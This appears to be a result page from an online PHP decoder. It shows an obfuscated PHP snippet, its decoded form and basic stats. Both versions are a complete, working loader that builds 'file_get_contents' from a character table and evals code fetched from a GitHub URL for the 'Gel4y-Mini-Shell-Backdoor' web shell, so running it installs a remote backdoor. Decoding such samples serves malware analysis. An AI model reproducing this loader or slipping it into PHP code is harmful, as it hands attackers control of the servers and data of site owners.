Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"]=[chr(63),chr(62),chr(48),chr(49),chr(50..

Decoded Output download

<?php 
 
${"GLOBALS"}["O"]=[chr(63),chr(62),chr(48),chr(49),chr(50),chr(51),chr(52),chr(53),chr(54),chr(55),chr(56),chr(57),chr(97),chr(98),chr(99),chr(100),chr(101),chr(102),chr(103),chr(104),chr(105),chr(106),chr(107),chr(108),chr(109),chr(110),chr(111),chr(112),chr(113),chr(114),chr(115),chr(116),chr(117),chr(118),chr(119),chr(120),chr(121),chr(122),chr(65),chr(66),chr(67),chr(68),chr(69),chr(70),chr(71),chr(72),chr(73),chr(74),chr(75),chr(76),chr(77),chr(78),chr(79),chr(80),chr(81),chr(82),chr(83),chr(84),chr(85),chr(86),chr(87),chr(88),chr(89),chr(90),chr(95),chr(40),chr(41)]; 
${"GLOBALS"}["o"]=${"GLOBALS"}["O"][17].${"GLOBALS"}["O"][20].${"GLOBALS"}["O"][23].${"GLOBALS"}["O"][16].${"GLOBALS"}["O"][64].${"GLOBALS"}["O"][18].${"GLOBALS"}["O"][16].${"GLOBALS"}["O"][31].${"GLOBALS"}["O"][64].${"GLOBALS"}["O"][14].${"GLOBALS"}["O"][26].${"GLOBALS"}["O"][25].${"GLOBALS"}["O"][31].${"GLOBALS"}["O"][16].${"GLOBALS"}["O"][25].${"GLOBALS"}["O"][31].${"GLOBALS"}["O"][30]; 
@eval(${"GLOBALS"}["O"][0].${"GLOBALS"}["O"][1].${"GLOBALS"}["o"]("https://raw.githubusercontent.com/22XploiterCrew-Team/Gel4y-Mini-Shell-Backdoor/1.x.x/gel4y.php")); 
 ?>

Did this file decode correctly?

Original Code

<?php

${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"]=[chr(63),chr(62),chr(48),chr(49),chr(50),chr(51),chr(52),chr(53),chr(54),chr(55),chr(56),chr(57),chr(97),chr(98),chr(99),chr(100),chr(101),chr(102),chr(103),chr(104),chr(105),chr(106),chr(107),chr(108),chr(109),chr(110),chr(111),chr(112),chr(113),chr(114),chr(115),chr(116),chr(117),chr(118),chr(119),chr(120),chr(121),chr(122),chr(65),chr(66),chr(67),chr(68),chr(69),chr(70),chr(71),chr(72),chr(73),chr(74),chr(75),chr(76),chr(77),chr(78),chr(79),chr(80),chr(81),chr(82),chr(83),chr(84),chr(85),chr(86),chr(87),chr(88),chr(89),chr(90),chr(95),chr(40),chr(41)];
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6f"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][17].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][20].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][23].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][16].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][64].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][18].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][16].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][31].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][64].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][14].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][26].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][25].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][31].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][16].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][25].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][31].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][30];
@eval(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][0].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f"][1].${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6f"]("https://raw.githubusercontent.com/22XploiterCrew-Team/Gel4y-Mini-Shell-Backdoor/1.x.x/gel4y.php"));

Function Calls

None

Variables

None

Stats

MD5 dc25f088b7fdcec813fd397887827624
Eval Count 0
Decode Time 49 ms